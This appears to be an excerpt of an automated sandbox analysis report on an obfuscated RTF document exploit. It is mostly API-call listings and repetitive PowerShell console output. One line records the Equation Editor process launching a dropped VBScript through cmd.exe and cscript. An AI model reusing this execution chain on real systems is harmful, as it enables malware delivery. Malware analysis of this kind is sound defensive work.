          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02550C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0254FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_02551D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EA360 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EA410 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EA490 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EA540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000EA35B NtCreateFile,
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.15350.rtfJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@12/12@6/4
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: explorer.exe, 0000000B.00000000.495861746.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\cscript.exeConsole Write: .................................3......(.P.....|.......$....................................................................... . ....... .....
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............................................`I.........v.....................K..............j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................90k......>.............................}..v....P.>.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0.2.............}..v....`.>.....0.................n.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................90k......>.............................}..v......>.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..............."90k.... .n.............................}..v....`.>.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................90k......>.............................}..v......>.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..............."90k.... .n.............................}..v....`.>.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................90k......>.............................}..v......>.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....` ?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....!?.............................}..v.....!?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`(?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....)?.............................}..v.....)?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`0?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....1?.............................}..v.....1?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`8?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....9?.............................}..v.....9?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`@?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....A?.............................}..v.....A?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`H?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....I?.............................}..v.....I?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`P?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....Q?.............................}..v.....Q?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`X?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....Y?.............................}..v.....Y?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....``?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....a?.............................}..v.....a?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`h?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....i?.............................}..v.....i?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`p?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....q?.............................}..v.....q?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`x?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....y?.............................}..v.....y?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s..............."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.?.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......?.............................}..v......?.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......@.............................}..v......@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......@.............................}..v......@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......@.............................}..v......@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......@.............................}..v......@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....` @.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....!@.............................}..v.....!@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`(@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....)@.............................}..v.....)@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`0@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....1@.............................}..v.....1@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'..............."90k.... .n.............................}..v....`8@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................90k.....9@.............................}..v.....9@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3..............."90k.... .n.............................}..v....`@@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................90k.....A@.............................}..v.....A@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?..............."90k.... .n.............................}..v....`H@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................90k.....I@.............................}..v.....I@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K..............."90k.... .n.............................}..v....`P@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................90k.....Q@.............................}..v.....Q@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W..............."90k.... .n.............................}..v....`X@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................90k.....Y@.............................}..v.....Y@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c..............."90k.... .n.............................}..v....``@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................90k.....a@.............................}..v.....a@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o..............."90k.... .n.............................}..v....`h@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................90k.....i@.............................}..v.....i@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{..............."90k.... .n.............................}..v....`p@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................90k.....q@.............................}..v.....q@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`x@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....y@.............................}..v.....y@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....`.@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......@.............................}..v......@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............).|.I.`.E.`.X... .n.............................}..v....H.@.....0.................n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......@.............................}..v......@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....H.@.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......@.............................}..v......@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .E.x.c.e.p.t.i.o.n.........................}..v......@.....0.................n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......@.............................}..v....P.@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....x.@.....0.......................`.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k....0.@.............................}..v......@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ......."90k.... .n.............................}..v....@.@.....0.................n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......@.............................}..v....x.@.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v.....[$.....0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....[$.............................}..v....@\$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.5.............}..v....P`$.....0.................n.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................90k.....a$.............................}..v.....a$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3..............."90k.... .n.............................}..v....Ph$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................90k.....i$.............................}..v.....i$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?..............."90k.... .n.............................}..v....Pp$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................90k.....q$.............................}..v.....q$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K..............."90k.... .n.............................}..v....Px$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................90k.....y$.............................}..v.....y$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W..............."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c..............."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o..............."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{..............."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.$.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......$.............................}..v......$.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;..............."90k.... .n.............................}..v....P.%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................90k......%.............................}..v......%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G..............."90k.... .n.............................}..v....P %.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................90k.....!%.............................}..v.....!%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S..............."90k.... .n.............................}..v....P(%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................90k.....)%.............................}..v.....)%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._..............."90k.... .n.............................}..v....P0%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................90k.....1%.............................}..v.....1%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k..............."90k.... .n.............................}..v....P8%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................90k.....9%.............................}..v.....9%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w..............."90k.... .n.............................}..v....P@%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................90k.....A%.............................}..v.....A%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....PH%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....I%.............................}..v.....I%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....PP%.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................90k.....Q%.............................}..v.....Q%.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................."90k.... .n.............................}..v....PX%.....0...............................................
